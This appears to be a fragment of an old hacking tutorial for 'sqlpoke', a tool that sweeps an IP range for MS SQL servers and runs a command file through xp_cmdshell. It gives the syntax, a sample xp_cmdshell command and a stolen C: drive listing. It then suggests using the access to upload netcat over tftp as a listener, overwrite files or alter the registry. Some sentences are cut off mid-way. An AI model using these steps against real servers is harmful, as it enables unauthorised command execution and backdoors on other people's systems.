sqlpoke [Start IP] [End IP] [Port] [Command File]
Note:- No more than 32 Commands allowed in the command file.
188.8.131.52 1433 commands.txt
Note: - commands.txt = xp_cmdshell 'dir c:\
Extra Note: - You must have SQL
credentials for this to work!
Obviously the command passed to the sql
server should have outputted the directory listing of the c:\ drive to a
file called ip.txt utilsing the dangerous function xp_cmdshell which it
volume in drive C has no label.
Volume Serial Number is DC22-D212
Directory of c:\
07/21/06 09:57a 0 AUTOEXEC.BAT
07/21/06 09:57a 0 CONFIG.SYS
07/21/06 09:23a <DIR> MSSQL7
07/21/06 10:38a 180,355,072 pagefile.sys
07/21/06 09:13a <DIR> Program Files
07/21/06 09:24a <DIR> TEMP
07/21/06 10:45a <DIR> WINNT
8 File(s) 180,355,072 bytes
1,654,722,048 bytes free
The beauty of this is though you can use
this to say open a tftp session to a remote machine and possibly upload
netcat and start it listening, overwrite files or read the registry/
change a registry key etc. dependant on what in-built SQL server
function are enabled on the system.